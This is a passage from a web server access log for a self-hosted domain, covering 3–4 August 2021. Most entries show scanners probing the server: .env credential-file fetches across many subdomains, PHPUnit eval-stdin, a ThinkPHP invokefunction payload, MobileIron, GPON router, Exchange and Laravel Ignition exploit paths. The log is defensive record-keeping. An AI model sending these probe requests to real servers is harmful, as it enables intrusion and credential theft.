Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:10 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [03/Aug/2021:18:02:11 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [03/Aug/2021:21:08:19 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Aug/2021:21:08:19 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Aug/2021:21:08:19 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Aug/2021:21:08:19 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Aug/2021:21:08:19 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Aug/2021:21:08:19 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [03/Aug/2021:21:54:05 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Aug/2021:21:54:05 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [03/Aug/2021:22:06:58 +0000] 444 - GET https speedtest.moralanimal.net "/" [Client 124.126.78.190] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [03/Aug/2021:22:08:01 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 61.135.15.186] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [03/Aug/2021:22:17:39 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.216.7] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Aug/2021:22:21:19 +0000] 444 - GET https oauth.moralanimal.net "/" [Client 61.135.15.200] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [03/Aug/2021:22:27:57 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.217.101] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Aug/2021:22:55:06 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.218.49] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [03/Aug/2021:23:20:49 +0000] 444 - GET https booksonic.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:49 +0000] 444 - GET https trilium.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:49 +0000] 444 - GET https agent.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:49 +0000] 444 - GET https sql.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:49 +0000] 444 - GET https traefik.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:49 +0000] 444 - GET https io.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https router.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https mosquitto.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https guacamole.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https tpm.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https oauth.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https komga.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https home.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https whoami.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:50 +0000] 444 - GET https lndshark.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:20:52 +0000] 444 - GET https jdownloader.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:10 +0000] 444 - POST https oauth.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:10 +0000] 444 - POST https mosquitto.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:10 +0000] 444 - POST https router.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:10 +0000] 444 - POST https trilium.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:10 +0000] 444 - POST https sql.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https agent.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https io.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https guacamole.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https oauth.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https router.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https mosquitto.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https sql.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https agent.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https guacamole.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https io.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https trilium.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https komga.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:11 +0000] 444 - POST https booksonic.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:12 +0000] 444 - POST https tpm.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:12 +0000] 444 - POST https komga.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:12 +0000] 444 - POST https booksonic.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:12 +0000] 444 - POST https tpm.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:12 +0000] 444 - POST https traefik.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:12 +0000] 444 - POST https home.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:13 +0000] 444 - POST https whoami.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:13 +0000] 444 - POST https lndshark.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:13 +0000] 444 - POST https jdownloader.moralanimal.net "/" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:13 +0000] 444 - POST https traefik.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:13 +0000] 444 - POST https home.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:13 +0000] 444 - POST https whoami.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:13 +0000] 444 - POST https lndshark.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:21:13 +0000] 444 - POST https jdownloader.moralanimal.net "/.env" [Client 46.28.206.105] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "-" [03/Aug/2021:23:35:16 +0000] 444 - GET https home.moralanimal.net "/" [Client 61.135.15.188] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [04/Aug/2021:00:11:08 +0000] 444 - GET https io.moralanimal.net "/" [Client 61.135.15.132] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; U; Android 9; zh-cn; RMX1901 Build/QKQ1.190918.001) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/70.0.3538.80 Mobile Safari/537.36 HeyTapBrowser/40.7.22.1" "-" [04/Aug/2021:01:49:31 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.35.168.16] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Aug/2021:03:46:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 89.248.168.143] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/81.0.4044.129 Safari/537.36" "https://google.com" [04/Aug/2021:03:50:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.83.66.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:65.0) Gecko/20100101 Firefox/65.0" "-" [04/Aug/2021:04:33:45 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Aug/2021:04:40:24 +0000] 400 - GET http localhost "/" [Client 61.219.11.151] [Length 154] [Gzip -] "-" "-" [04/Aug/2021:04:59:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.254] [Length 0] [Gzip -] "-" "-" [04/Aug/2021:05:25:53 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:25:53 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:25:55 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:25:58 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:25:58 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:25:58 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:25:59 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [04/Aug/2021:05:26:00 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:26:01 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:26:02 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:26:03 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [04/Aug/2021:05:44:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 164.52.24.162] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:79.0) Gecko/20100101 Firefox/79.0" "-" [04/Aug/2021:06:02:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.220.181] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Aug/2021:06:35:51 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [04/Aug/2021:07:14:54 +0000] 444 - GET https mosquitto.moralanimal.net "/" [Client 142.54.177.4] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36" "http://www.google.com.hk" [04/Aug/2021:07:18:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Aug/2021:07:31:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0" "-" [04/Aug/2021:09:47:41 +0000] 400 - GET https localhost "/NRtH" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [04/Aug/2021:09:57:50 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.218.161] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Aug/2021:11:11:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.33.55.67] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.61 Safari/537.36" "-" [04/Aug/2021:11:13:19 +0000] 400 - GET http 64.22.31.253 "/api/v1" [Client 147.182.173.88] [Length 252] [Gzip -] "python-requests/2.22.0" "-" [04/Aug/2021:11:13:19 +0000] 444 - GET https 64.22.31.253 "/api/v1" [Client 147.182.173.88] [Length 0] [Gzip -] "python-requests/2.22.0" "-" [04/Aug/2021:11:41:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.71.234.116] [Length 0] [Gzip -] "Mozilla/5.0 (iPhone; CPU iPhone OS 11_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1" "-" [04/Aug/2021:12:06:50 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [04/Aug/2021:13:49:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.54] [Length 0] [Gzip -] "-" "-" [04/Aug/2021:13:49:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.54] [Length 252] [Gzip -] "-" "-" [04/Aug/2021:13:49:37 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.54] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [04/Aug/2021:16:22:10 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 192.227.134.73] [Length 0] [Gzip -] "curl/7.3.2" "-" [04/Aug/2021:16:38:11 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 198.199.98.33] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Aug/2021:16:42:28 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [04/Aug/2021:16:52:00 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.203.137] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Aug/2021:17:01:39 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.214.186] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Aug/2021:17:11:04 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.207.100] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [04/Aug/2021:19:01:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 54.67.65.135] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [04/Aug/2021:19:45:32 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.33.96.205] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [04/Aug/2021:21:01:43 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Aug/2021:21:01:43 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Aug/2021:21:01:43 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Aug/2021:21:01:43 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Aug/2021:21:01:43 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Aug/2021:21:01:43 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [04/Aug/2021:22:45:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; 